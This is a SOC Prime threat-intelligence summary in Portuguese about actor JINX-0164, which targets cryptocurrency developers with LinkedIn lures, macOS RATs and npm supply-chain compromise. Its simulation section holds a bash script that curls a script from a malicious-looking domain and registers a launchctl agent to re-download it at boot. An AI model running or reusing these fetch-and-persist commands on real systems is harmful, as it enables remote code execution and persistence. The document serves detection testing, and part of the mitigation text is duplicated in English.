SOC Prime Bias: Crítico

29 May 2026 07:25 UTC
newspaper icon wiz.io

Infraestrutura de Desenvolvimento de Software Cripto Alvo de Novo Ameaçador

Author Photo
SOC Prime Team linkedin icon Seguir
Infraestrutura de Desenvolvimento de Software Cripto Alvo de Novo Ameaçador
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumo

Um ator de ameaças motivado financeiramente, rastreado como JINX-0164, está visando desenvolvedores de criptomoedas por meio de engenharia social no LinkedIn, malware para macOS e comprometimento de CI/CD. O grupo implanta um RAT personalizado em Python conhecido como AUDIOFIX e uma backdoor baseada em Go chamada MINIRAT, ambos configurados para se comunicarem com domínios de comando e controle embutidos. Após ganhar acesso, os atacantes roubam credenciais de nuvem e desenvolvimento, adulteram repositórios de código e até publicam pacotes npm maliciosos para expandir o acesso e permitir o roubo de criptomoedas. A campanha reflete uma ameaça sofisticada à cadeia de suprimentos direcionada ao ciclo de vida do desenvolvimento de software.

Investigação

O Wiz CIRT acompanhou a intrusão desde o contato inicial no LinkedIn até a entrega de links maliciosos, execução de cargas úteis para macOS, roubo de credenciais e movimento lateral em repositórios de código-fonte. Sua investigação revelou scripts de dropper, persistência por meio de launchctl, e o uso da ferramenta nord-stream para exfiltração de segredos. Os pesquisadores também identificaram múltiplos domínios falsificados, nós de saída VPN, e um comprometimento na cadeia de suprimentos envolvendo o pacote npm @velora-dex/sdk . Caminhos de arquivos, hashes, domínios e endereços IP foram coletados para suportar a detecção e caça de ameaças.

Mitigação

As defesas recomendadas incluem monitoramento de sistemas macOS para persistência, detecção de LaunchAgents suspeitos, e bloqueio de domínios maliciosos conhecidos e servidores de comando e controle. As organizações devem impor commits assinados, habilitar o GitHub Vigilant Mode e observar commits não verificados ou mudanças incomuns em fluxos de trabalho de CI/CD. O uso de VPN deve ser limitado a provedores aprovados, e MFA deve ser exigido para contas de nuvem e plataformas de desenvolvimento. launchctl persistence, detecting suspicious LaunchAgents, and blocking the known malicious domains and command-and-control servers. Organizations should enforce signed commits, enable GitHub Vigilant Mode, and watch for unverified commits or unusual CI/CD workflow changes. VPN use should be limited to approved providers, and MFA should be required for cloud accounts and development platforms.

Resposta

Se esta atividade for detectada, isole imediatamente o sistema macOS afetado, colete artefatos forenses, e revogue quaisquer credenciais e tokens de API comprometidos. As equipes de segurança devem realizar uma revisão completa dos repositórios de código para commits maliciosos e remover quaisquer pacotes npm comprometidos. Os domínios de comando e controle identificados devem ser bloqueados, e as regras de firewall devem ser atualizadas para negar tráfego aos endereços IP maliciosos. As partes interessadas relevantes devem ser notificadas, e a troca de inteligência sobre ameaças com parceiros confiáveis da indústria deve ser considerada.

Fluxo de Ataque

Ainda estamos atualizando esta parte. Inscreva-se para ser notificado

Notifique-me

Execução de Simulação

Pré-requisito: O Cheque Preliminar de Telemetria e Base já deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e buscar gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa & Comandos do Ataque:

    1. Ponto de acesso inicial: Um atacante envia um email de phishing contendo um link malicioso (T1566.004). A vítima clica no link, que aponta para https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh.
    2. Download de carga útil: O terminal da vítima executa um comando curl que busca silenciosamente o script.
    3. Configuração de persistência: O script registra um agente de lançamento usando launchctl submit, incorporando o mesmo comando curl comando para que a carga útil seja re‑baixada a cada inicialização (T1546.006).
    4. Execução: O agente de lançamento opera com privilégios de sistema, executando o script baixado para comprometer o host.

  • Script de Teste de Regressão: (execute em uma máquina de teste macOS; requer direitos de administrador)

    #!/bin/bash
set -euo pipefail

# 1. Simula o download malicioso do curl (sem código malicioso real)
MALICIOUS_URL="https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh"
curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh

# 2. Registre um agente de lançamento que re‑baixe o script na inicialização
launchctl submit -l com.malicious.audiofix 
    -p /usr/bin/curl -a -c 
    -t "30" 
    /usr/bin/curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh

echo "Agente de lançamento malicioso registrado. Verifique o SIEM para detecção."

  • Comandos de Limpeza:

    # Remova o agente de lançamento
launchctl remove com.malicious.audiofix || true

# Exclua o script baixado
rm -f /tmp/audio-fix.sh

echo "Limpeza completa."

Fim do Relatório

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e gerar valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Cadastre-se Gratuitamente